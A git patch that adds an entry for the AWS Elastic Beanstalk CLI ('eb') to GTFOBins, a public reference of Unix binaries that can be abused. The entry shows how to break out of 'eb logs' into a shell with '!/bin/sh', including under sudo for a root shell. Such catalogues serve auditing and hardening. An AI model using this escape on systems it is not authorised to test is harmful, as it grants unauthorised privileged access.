From 1b4e4ab15ecb84ac2893fcc0cc09f130e1c6d65d Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Wed, 4 Mar 2020 20:24:29 +0100 Subject: [PATCH] Add eb --- _gtfobins/eb.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 _gtfobins/eb.md diff --git a/_gtfobins/eb.md b/_gtfobins/eb.md new file mode 100644 index 0000000..420d4fd --- /dev/null +++ b/_gtfobins/eb.md @@ -0,0 +1,12 @@ +--- +description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI. +functions: + shell: + - code: | + eb logs + !/bin/sh + sudo: + - code: | + sudo eb logs + !/bin/sh +---